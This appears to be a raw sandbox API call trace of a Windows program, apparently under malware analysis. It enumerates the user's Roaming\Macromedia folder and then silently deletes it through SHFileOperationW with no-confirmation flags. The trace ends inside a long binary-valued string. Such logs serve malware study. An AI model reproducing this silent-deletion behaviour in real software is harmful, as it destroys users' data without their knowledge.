GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia")) returned 0x2010 [0200.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xccc, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58a0 [0200.849] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xccc, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0200.849] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xccc, dwReserved1=0x4, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0200.849] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xccc, dwReserved1=0x4, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0200.850] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0200.850] GetLastError () returned 0x12 [0200.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.850] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0200.851] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.851] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0200.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0200.853] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Macromedia", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia", lpFilePart=0x8bf658*="Macromedia") returned 0x38 [0200.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.853] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia")) returned 0x2010 [0200.854] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\